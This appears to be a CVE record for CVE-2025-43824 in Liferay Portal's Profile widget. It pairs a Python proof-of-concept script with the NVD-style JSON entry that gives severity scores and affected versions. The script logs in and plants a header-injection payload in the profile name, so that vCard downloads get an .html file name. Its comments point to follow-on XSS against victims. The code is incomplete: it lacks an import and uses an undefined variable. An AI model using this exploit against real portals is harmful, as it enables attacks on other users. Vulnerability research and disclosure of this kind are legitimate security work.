CVE-2025-43824

# CVE-2025-43824 PoC - Content-Disposition Header Injection via Profile Name # Vulnerability: Liferay Portal Profile widget allows file extension manipulation # via unsanitized user name in Content-Disposition header when downloading vCard import requests TARGET_URL = "https://liferay.example.com" USERNAME = "attacker_user" PASSWORD = "attacker_password" # Step 1: Login to Liferay Portal session = requests.Session() login_data = { "_com_liferay_login_web_portlet_LoginPortlet_formDate": "", "_com_liferay_login_web_portlet_LoginPortlet_login": USERNAME, "_com_liferay_login_web_portlet_LoginPortlet_password": PASSWORD, "_com_liferay_login_web_portlet_LoginPortlet_checkboxNames": "rememberMe" } session.post(f"{TARGET_URL}/web/guest/home", data=login_data) # Step 2: Update profile name with malicious payload # The payload injects a new filename parameter to change file extension malicious_name = 'attacker"; filename="malicious.html' profile_data = { "_com_liferay_profile_web_portlet_ProfilePortlet_formDate": "", "_com_liferay_profile_web_portlet_ProfilePortlet_firstName": malicious_name, "_com_liferay_profile_web_portlet_ProfilePortlet_lastName": "Test", "_com_liferay_profile_web_portlet_ProfilePortlet_emailAddress": "[email protected]" } session.post(f"{TARGET_URL}/group/control_panel/manage?p_p_id=com_liferay_profile_web_portlet_ProfilePortlet", data=profile_data) # Step 3: Trigger vCard download and observe manipulated Content-Disposition header response = session.get(f"{TARGET_URL}/c/portal/profile/vcard/{USER_SCREENNAME}") print("Content-Disposition Header:") print(response.headers.get("Content-Disposition")) # Expected output: attachment; filename="attacker"; filename="malicious.html" # Browser may interpret this as downloading a .html file instead of .vcf # Step 4: The downloaded file can now be crafted as HTML with embedded JavaScript # for further XSS attacks when opened by victims

{"cve": {"id": "CVE-2025-43824", "sourceIdentifier": "[email protected]", "published": "2025-10-06T22:15:37.027", "lastModified": "2025-12-15T18:03:15.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Profile widget in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, 7.4 GA through update 92, and older unsupported versions uses a user’s name in the “Content-Disposition” header, which allows remote authenticated users to change the file extension when a vCard file is downloaded."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.4", "matchCriteriaId": "5F7BCC0B-5F36-4E6B-AABE-61B88E9A99D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q3.1", "versionEndExcluding": "2023.q3.9", "matchCriteriaId": "C3ED7CF1-6D8A-40F7-A009-F3A800F955BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.4.3.112", "matchCriteriaId": "DB7A94B9-BEA9-4EF1-ABB0-BCB2F0C1A52B"}]}]}], "references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43824", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}